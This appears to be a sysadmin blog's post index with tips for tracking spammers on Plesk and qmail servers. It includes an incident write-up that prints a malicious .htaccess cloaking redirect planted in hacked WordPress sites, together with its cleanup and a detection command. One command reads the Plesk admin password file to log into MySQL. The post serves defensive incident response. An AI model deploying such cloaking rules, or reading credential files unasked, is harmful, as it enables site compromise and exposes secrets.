Logging from to and subject in postfix

by WanderingTechy October 22, 2014

We needed to analyse the from, to and subject on one of our servers to deal with a persistent spammer.

Add this to your header_checks

/^subject:/     WARN

Blocking a spammer with firewall on a fresh chain.

by WanderingTechy October 21, 2014

A client uses fail2ban plus a number of other custom scripts to build his firewall to block unwanted access.  The firewall table was getting very confusing for him as he didn’t know which script had blocked the IP at a glance.

I cleaned up his tables and created a chain for each script.  Here is how I did it.

Read the rest of this entry »

Tracking which account is sending spam on a plesk server

by WanderingTechy October 20, 2014

This is not an easy task without knowing a few tricks as the log files are not an awful lot of help.   Providing you have the Plesk grey listing switched on and you know a little SQL and PHP the task is not that hard.

sqlite3 /var/lib/plesk/mail/greylist/data.db 'select * from data'

The above command will provide you with a list of senders, recipients and IP address.  I have written a couple of scripts which monitor this database every 5 minutes and extracts spammer signatures which then get emailed to me.  I usually catch them within 10-15 minutes of starting their run these days.

Here is a list of the columns in the database;

sqlite> PRAGMA table_info(data);

Using the above and some data from the headers from one of the spam emails you can quickly extract the sender.

If the spammer is changing the from address so it doesn’t match an account on the server you can filter the logs as follows;

Read the rest of this entry »

qmail delete all emails from specific domain in queue

by WanderingTechy September 22, 2014

I installed qmailhandle and tried to delete using wildcards and it didn’t work.

This command however does.

/usr/bin/qmhandle.pl -h'\@domain'

flush the qmail queue

by WanderingTechy September 22, 2014

To retry all the emails in the qmail queue

kill -ALRM `ps ax | grep [q]mail-send | awk '{print $1}'`

smtp auth spam problems with qmail on plesk?

by WanderingTechy June 14, 2014

Recently I have been getting quite a few spam problems where the spammers were using valid smtp auth accounts on my server.  They have either dictionary attacked the account or the password has leaked.

After quite a bit of hacking about I have come up with this single command (long one) which will list any smtp_auth login that has been authorised from more than 10 different IP addresses.  My logs rotate every 24 hours so I didn’t need to filter by date.

THIS WORKS ON:  Centos 6.5 with Plesk 10.x installed using qmail.   Your usage may vary.

cat /usr/local/psa/var/log/maillog | grep "smtp_auth" | awk '/logged in from/ {print $8"\t"$14}' | sort -u -k1 | awk '{ print $1 }' | sort | uniq -c |  sed -e 's/^[ \t]*//' | awk '$1 >= 10'

Before anyone comments that I have unnecessary cats and there are better ways to do this.  I want it done in clear easy to understand stages so that when I come back to it later it is still readable.  Don’t use it if you don’t like it…

Read the rest of this entry »

mod_fcgid: HTTP request length 132330 (so far) exceeds MaxRequestLen (131072)

by WanderingTechy May 27, 2014

If you get unusual errors when uploading a file via http check the error log.  If you see this error message

[Tue May 27 17:55:15 2014] [warn] [client] mod_fcgid: HTTP request length 132330 (so far) exceeds MaxRequestLen (131072), referer: http://www.example.com/

Add this to your /etc/httpd/conf.d/fcgid.conf

MaxRequestLen 15728640

This works on Centos 6.X and should work on others.  This can cause problems in software such as forums, WordPress and MediaWiki.

how to extract a list of domains from a plesk server

by WanderingTechy May 7, 2014

I need a list of domains to use in a script for rebuilding a DNS server.

This did the job.

mysql -uadmin -p`cat /etc/psa/.psa.shadow` psa -Ns -e "select name from domains" > domains.txt

Track down an SMTP user login on plesk 9 Qmail install.

by WanderingTechy April 23, 2014

A client contact me today to say he had received an email from his dedicated hosting provider stating that his server was sending out masses of spam.

To track down the smtp user responsible for this use the following command.

grep smtp_auth /usr/local/psa/var/log/maillog

Valid for qmail on plesk 9 installs at least may work for qmail installs on other servers.

Unusual hack. WordPress htaccess redirect for search engines only.

by WanderingTechy September 19, 2013

I had a couple of clients complaining that their wordpress sites had been hacked.

I went to their site and saw nothing out of place.  A quick check of their index.php file and database didn’t show anything up which is where they usual strike.

I requested further information at which point the clients finally mentioned that it was google that was saying the sites were compromised and showing pharmacy links.

With this new information a quick look at all the files in the site looking for the most recently modified.

ls -lat

is your friend here.

This showed that the most recently modified files were

A quick look in the files showed the cause and the problem.

# Apache search queries statistic module
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|aol|bing|crawl|aspseek|icio|robot|spider|nutch|slurp|msnbot) [OR]
RewriteCond %{HTTP_REFERER} (google|aol|yahoo|msn|search|bing)
RewriteCond %{REQUEST_URI} /$ [OR]
RewriteCond %{REQUEST_FILENAME} (shtml|html|htm|php|xml|phtml|asp|aspx)$ [NC]
RewriteCond %{REQUEST_FILENAME} !common.php
RewriteCond %{DOCUMENT_ROOT}/common.php -f
RewriteRule ^.*$    /common.php [L]

The two php files were encrypted using


As you can see the .htaccess file is checking to see if it is a search engine visiting and if so redirect to common.php  which pumps the pharma pages/links.
If is is a normal visitor ie you or me it returns the proper page.

The effect of this is to push the targeted sites up the search rankings by appearing more popular than they actually are.  Google have caught onto this ploy and now tag the sites as compromised.

To fix this simply delete all three files and reset the ftp password.

In case you are wondering the users were compromised because they used weak FTP passwords.   They have been educated on this now and a new password difficulty test has been put in place with respect to choosing new passwords.

To do a server wide test for this hack use the following command.

find /var/www/vhosts/*/httpdocs/.htaccess -print | xargs grep -l "common.php"

Obviously change the path if it is different on your server (this one is for a plesk/Centos server)